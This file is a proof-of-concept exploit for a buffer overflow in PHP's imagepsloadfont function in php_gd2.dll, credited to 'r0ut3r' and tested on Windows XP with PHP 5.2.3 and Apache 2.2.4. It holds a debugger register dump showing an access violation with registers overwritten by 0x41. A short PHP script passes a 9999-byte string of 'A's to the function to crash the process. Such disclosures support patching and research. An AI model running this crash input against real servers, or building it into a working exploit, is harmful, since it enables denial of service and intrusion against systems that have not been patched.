phpgd2-overflow.txt

`<?php  
/*  
PHP imagepsloadfont Buffer Overflow Vulnerability  
  
Discovered & Coded by: r0ut3r (writ3r [at] gmail.com)  
  
Vulnerable dll: php_gd2.dll  
- Tested on WinXP SP0, PHP/5.2.3, Apache 2.2.4  
  
The argument given was A * 9999  
  
Access violation when reading [41414151]  
----------------------------------------  
  
Registers:  
----------  
EAX 77F76238 ntdll.77F76238  
ECX 77C2AB33 MSVCRT.77C2AB33  
EDX 01543260 php_gd2.01543260  
EBX 41414141  
ESP 00C0FD58  
EBP 00C0FD90  
ESI 41414141  
EDI 00222738  
EIP 77F53284 ntdll.77F53284  
C 0 ES 0023 32bit 0(FFFFFFFF)  
P 0 CS 001B 32bit 0(FFFFFFFF)  
A 1 SS 0023 32bit 0(FFFFFFFF)  
Z 0 DS 0023 32bit 0(FFFFFFFF)  
S 0 FS 0038 32bit 7FFDE000(FFF)  
T 0 GS 0000 NULL  
D 0  
O 0 LastErr ERROR_SUCCESS (00000000)  
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)  
ST0 empty +UNORM 7D18 00560000 00561378  
ST1 empty +UNORM 2402 0012BCD0 00000001  
ST2 empty +UNORM 17CD 77F516F5 FFFFFFFF  
ST3 empty 0.0889391783750232330e-4933  
ST4 empty +UNORM 0082 0017020C 77D43A5F  
ST5 empty +UNORM 0002 77D489FF 00000000  
ST6 empty 10000.00000000000000  
ST7 empty 10000.00000000000000  
3 2 1 0 E S P U O Z D I  
FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)  
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1  
  
Proof of concept below:   
*/  
  
if (!extension_loaded("gd"))  
die("PHP_GD2 extension not loaded!");  
  
$buff = str_repeat("A",9999);  
  
$res = imagepsloadfont($buff);  
echo "boom!!\n";  
?>  
`